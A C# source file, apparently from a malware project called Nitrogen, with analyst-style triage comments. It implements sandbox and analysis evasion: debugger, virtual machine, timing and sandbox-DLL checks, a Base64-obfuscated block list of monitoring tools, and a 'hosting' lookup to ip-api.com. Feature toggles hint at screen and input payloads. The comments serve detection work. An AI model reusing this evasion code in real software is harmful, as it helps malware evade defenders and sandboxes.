using System;
using System.Diagnostics;
using System.Linq;
using System.Management;
using System.Net;
using System.Reflection;
using System.Text;
using System.Threading;
using static Nitrogen.Dll_Imports;

namespace Nitrogen
{
    /// <summary>
    /// Static configuration flags plus a set of environment checks (single-instance,
    /// debugger, virtual machine, timing, loaded-module, process-name and hosting lookups).
    /// <see cref="IsAnalyzed"/> is the only public entry point to the environment checks.
    /// </summary>
    /// <remarks>
    /// Triage notes: every string used by the module, process and URL checks is stored
    /// Base64-encoded and decoded at call time, so plain-text string searches over the
    /// binary will not find them; search for the Base64 literals or decode them first.
    /// CheckRemoteDebuggerPresent and GetModuleHandle are not declared in this file; they
    /// come from Nitrogen.Dll_Imports through the "using static" directive.
    /// </remarks>
    internal class variables
    {
        // Feature toggles. Only the names and default values are visible here; the code
        // that reads them is elsewhere in the project.
        public static bool gdi_payloads = true;
        public static bool window_shake = false;
        public static bool textchanger = true;
        // Disabled toggle left in the source by the author:
        //public static bool drawcursor = false;
        public static bool mouse = false;
        public static bool keyboard = false;
        public static bool iconmove = false;
        public static bool sounds = true;
        public static bool extreme = false;

        /// <summary>
        /// Reports whether another process is running from the same image path as this assembly.
        /// </summary>
        /// <returns>
        /// true when some process other than the current one has a first module whose file name
        /// equals the executing assembly's location; otherwise false.
        /// </returns>
        public static bool AlreadyRunning()
        {
            Process[] processes = Process.GetProcesses();
            Process currentProcess = Process.GetCurrentProcess();
            foreach (Process process in processes)
            {
                try
                {
                    // Modules[0] is the main module; compared by full path, with the current PID excluded.
                    if (process.Modules[0].FileName == Assembly.GetExecutingAssembly().Location && currentProcess.Id != process.Id)
                    {
                        return true;
                    }
                }
                catch
                {
                    // Any exception while reading a process's module list is swallowed and
                    // that process is skipped.
                }
            }
            return false;
        }

        /// <summary>
        /// Asks CheckRemoteDebuggerPresent whether a debugger is attached to the current process.
        /// </summary>
        /// <returns>The flag written by the call, or false if the call throws.</returns>
        private static bool IsDebuggerAttached()
        {
            bool flag = false;
            bool result;
            try
            {
                // The call's own return value is ignored; only the ref flag is used.
                CheckRemoteDebuggerPresent(Process.GetCurrentProcess().Handle, ref flag);
                result = flag;
            }
            catch
            {
                result = false;
            }
            return result;
        }

        /// <summary>
        /// Looks for virtual-machine markers in two WMI classes: Win32_ComputerSystem
        /// (Manufacturer and Model) and Win32_VideoController (Name).
        /// </summary>
        /// <returns>
        /// true when a marker matches or when the first query throws; otherwise false.
        /// </returns>
        /// <remarks>
        /// Both WMI query strings are in clear text in the source, so they are usable as
        /// static indicators, and as behavioural ones where WMI query activity is collected.
        /// </remarks>
        private static bool IsVirtualMachine()
        {
            using (ManagementObjectSearcher managementObjectSearcher = new ManagementObjectSearcher("Select * from Win32_ComputerSystem"))
            {
                try
                {
                    using (ManagementObjectCollection managementObjectCollection = managementObjectSearcher.Get())
                    {
                        foreach (ManagementBaseObject managementBaseObject in managementObjectCollection)
                        {
                            // Three alternatives: Manufacturer "microsoft corporation" with a Model
                            // containing "VIRTUAL"; a Manufacturer containing "vmware"; or a Model
                            // equal to "VirtualBox" (this last comparison is case-sensitive).
                            if ((managementBaseObject["Manufacturer"].ToString().ToLower() == "microsoft corporation" && managementBaseObject["Model"].ToString().ToUpperInvariant().Contains("VIRTUAL")) || managementBaseObject["Manufacturer"].ToString().ToLower().Contains("vmware") || managementBaseObject["Model"].ToString() == "VirtualBox")
                            {
                                return true;
                            }
                        }
                    }
                }
                catch
                {
                    // A failure of the query or of a property read is reported as "virtual machine".
                    return true;
                }
            }
            // Second query, outside the try block above, so an exception here propagates to the
            // caller. The searcher and the collection created on this line are not disposed.
            foreach (ManagementBaseObject managementBaseObject2 in new ManagementObjectSearcher("root\\CIMV2", "SELECT * FROM Win32_VideoController").Get())
            {
                // As written, both substrings must occur in the same adapter name for this to match.
                if (managementBaseObject2.GetPropertyValue("Name").ToString().Contains("VMware") && managementBaseObject2.GetPropertyValue("Name").ToString().Contains("VBox"))
                {
                    return true;
                }
            }
            return false;
        }

        /// <summary>
        /// Timing check: reads the clock, sleeps for 10 ms and reads the clock again.
        /// </summary>
        /// <returns>
        /// true when fewer than 10 ticks elapsed across the sleep (a DateTime tick is 100 ns),
        /// which is the case when the sleep did not really take place; otherwise false.
        /// </returns>
        private static bool IsEmulated()
        {
            try
            {
                long ticks = DateTime.Now.Ticks;
                Thread.Sleep(10);
                if (DateTime.Now.Ticks - ticks < 10L)
                {
                    return true;
                }
            }
            catch
            {
                // Exceptions are swallowed and the method falls through to false.
            }
            return false;
        }

        /// <summary>
        /// Checks whether any of five DLLs is already loaded in the current process.
        /// </summary>
        /// <returns>true when GetModuleHandle returns a non-zero handle for any of the names.</returns>
        private static bool IsSandBoxie()
        {
            // Decoded names, in order: SbieDll.dll, SxIn.dll, Sf2.dll, snxhk.dll, cmdvrt32.dll.
            // SbieDll.dll is the Sandboxie module the method is named after; the other four
            // look like modules injected by other security or sandbox products (attribution
            // to be confirmed).
            string[] array = new string[]
            {
                Encoding.UTF8.GetString(Convert.FromBase64String("U2JpZURsbC5kbGw=")),
                Encoding.UTF8.GetString(Convert.FromBase64String("U3hJbi5kbGw=")),
                Encoding.UTF8.GetString(Convert.FromBase64String("U2YyLmRsbA==")),
                Encoding.UTF8.GetString(Convert.FromBase64String("c254aGsuZGxs")),
                Encoding.UTF8.GetString(Convert.FromBase64String("Y21kdnJ0MzIuZGxs"))
            };
            for (int i = 0; i < array.Length; i++)
            {
                if (GetModuleHandle(array[i]).ToInt32() != 0)
                {
                    return true;
                }
            }
            return false;
        }

        /// <summary>
        /// Checks the running process list against a fixed list of monitoring-tool names.
        /// </summary>
        /// <returns>true when a process name, lower-cased, equals one of the listed names.</returns>
        private static bool IsBlacklistedProcessesRunning()
        {
            Process[] processes = Process.GetProcesses();
            // Decoded names, in order: processhacker, netstat, netmon, tcpview, wireshark,
            // filemon, regmon, cain. The comparison is whole-name equality against
            // Process.ProcessName, not a substring match.
            string[] source = new string[]
            {
                Encoding.UTF8.GetString(Convert.FromBase64String("cHJvY2Vzc2hhY2tlcg==")),
                Encoding.UTF8.GetString(Convert.FromBase64String("bmV0c3RhdA==")),
                Encoding.UTF8.GetString(Convert.FromBase64String("bmV0bW9u")),
                Encoding.UTF8.GetString(Convert.FromBase64String("dGNwdmlldw==")),
                Encoding.UTF8.GetString(Convert.FromBase64String("d2lyZXNoYXJr")),
                Encoding.UTF8.GetString(Convert.FromBase64String("ZmlsZW1vbg==")),
                Encoding.UTF8.GetString(Convert.FromBase64String("cmVnbW9u")),
                Encoding.UTF8.GetString(Convert.FromBase64String("Y2Fpbg=="))
            };
            foreach (Process process in processes)
            {
                if (source.Contains(process.ProcessName.ToLower()))
                {
                    return true;
                }
            }
            return false;
        }

        /// <summary>
        /// Queries an external IP-information service for the "hosting" field of the caller's address.
        /// </summary>
        /// <returns>
        /// true when the response body contains "true"; false otherwise, including on any exception.
        /// </returns>
        /// <remarks>
        /// The decoded URL is http://ip-api.com/line/?fields=hosting. The request goes out over
        /// plain HTTP, which makes it a network indicator for proxy and DNS logs.
        /// </remarks>
        private static bool IsHosted()
        {
            try
            {
                // The WebClient instance is not disposed.
                return new WebClient().DownloadString(Encoding.UTF8.GetString(Convert.FromBase64String("aHR0cDovL2lwLWFwaS5jb20vbGluZS8/ZmllbGRzPWhvc3Rpbmc="))).Contains("true");
            }
            catch
            {
                // Network and parsing failures are swallowed.
            }
            return false;
        }

        /// <summary>
        /// Combines the private environment checks of this class.
        /// </summary>
        /// <returns>true as soon as any one check returns true.</returns>
        /// <remarks>
        /// The || chain short-circuits left to right and IsHosted comes first, so the outbound
        /// HTTP request is made on every call, before any local check runs. IsVirtualMachine and
        /// IsSandBoxie can throw, and nothing here catches those exceptions.
        /// </remarks>
        public static bool IsAnalyzed()
        {
            return IsHosted() || IsSandBoxie() || IsVirtualMachine() || IsDebuggerAttached() || IsEmulated() || IsBlacklistedProcessesRunning();
        }
    }
}